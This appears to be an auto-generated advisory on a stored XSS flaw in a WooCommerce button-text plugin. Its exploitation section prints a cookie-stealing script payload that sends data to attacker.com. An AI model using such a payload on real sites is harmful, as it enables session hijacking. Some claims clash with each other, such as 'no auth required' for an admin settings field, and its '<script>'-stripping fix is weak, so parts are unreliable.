Listen to this Post
How the CVE Works:
CVE-2025-48254 is a stored Cross-Site Scripting (XSS) vulnerability in WPFactory’s “Change Add to Cart Button Text for WooCommerce” plugin (versions ≤ 2.2.2). The flaw arises from improper input sanitization in the plugin’s button text customization feature, allowing attackers to inject malicious JavaScript payloads. When an admin views the WooCommerce settings page, the payload executes in their browser, enabling session hijacking, phishing, or backdoor installation. The attack persists because the unsanitized input is stored in the database and rendered without escaping.
DailyCVE Form:
Platform: WordPress (WooCommerce)
Version: ≤ 2.2.2
Vulnerability: Stored XSS
Severity: Critical
Date: 2025-05-29
Prediction: Patch expected by 2025-06-10
What Undercode Say:
Exploitation:
1. Payload Injection:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Inserted via the plugin’s button text field.
- Trigger: Admin views WooCommerce settings, executing the payload.
Protection:
1. Temporary Mitigation:
UPDATE wp_options SET option_value = REPLACE(option_value, '<script>', '') WHERE option_name LIKE 'wpfactory_%';
2. WAF Rule: Block HTML/JS in `POST` requests to /wp-admin/admin-ajax.php.
3. Permanent Fix: Update plugin post-patch or remove it.
Detection:
grep -r "wpfactory_add_to_cart_text" /var/www/html/wp-content/plugins/
Analytics:
- Attack Vector: Low complexity; no auth required.
- Impact: Full admin compromise.
- Exploitability: High (publicly PoC expected).
Debugging:
// Debug unsanitized output in plugin:
add_filter('woocommerce_product_add_to_cart_text', function($text) {
error_log(print_r($text, true)); // Check for raw HTML.
return esc_html($text); // Force sanitization.
});
References:
- Patchstack Advisory: [PSA-2025-48254]
- CWE-79: Improper Neutralization of Input.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
